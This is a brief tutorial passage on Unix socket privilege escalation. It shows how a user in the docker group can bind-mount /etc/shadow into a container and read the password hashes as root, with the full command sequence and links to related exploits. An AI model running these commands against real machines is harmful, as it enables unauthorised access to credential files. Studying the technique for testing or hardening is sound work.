Unix Socket Exploitation

A Unix socket is another component in *nix systems that you can leverage to escalate your privileges.To safely use a Unix socket, the appropriate security measures/permissions must be implemented beforehand. As you can imagine, this is not always the case.

The easiest to follow example on how to leverage an insufficiently secured Unix socket is Docker. By design, the docker daemon binds to a Unix socket instead of a TCP port. By default, that Unix socket is owned by the user root; additionally, the docker daemon always runs as the root user.

Suppose you landed on a machine and the current user is an unprivileged user, that happens to have access to the docker command (he is part of docker group). Also, suppose that the docker Unix socket is not protected by implementing the appropriate permissions.

Let’s see how we could escalate our privileges in that machine. Specifically, let try to access /etc/shadow.

docker run -v /etc/shadow:/docker/hashedpasswords -d postgres
docker exec -ti {CONTAINER_ID} bash
root@XXXXXXXXXXXX:/# cat /docker/hashedpasswords > /docker/test.txt
root@XXXXXXXXXXXX:/# chmod 777 /docker/test.txt
root@XXXXXXXXXXXX:/# cat /docker/test.txt

Two more interesting examples on leveraging Unix sockets for privilege escalation are the following: https://www.exploit-db.com/exploits/40962/ https://github.com/rapid7/metasploit-framework/pull/9408/files\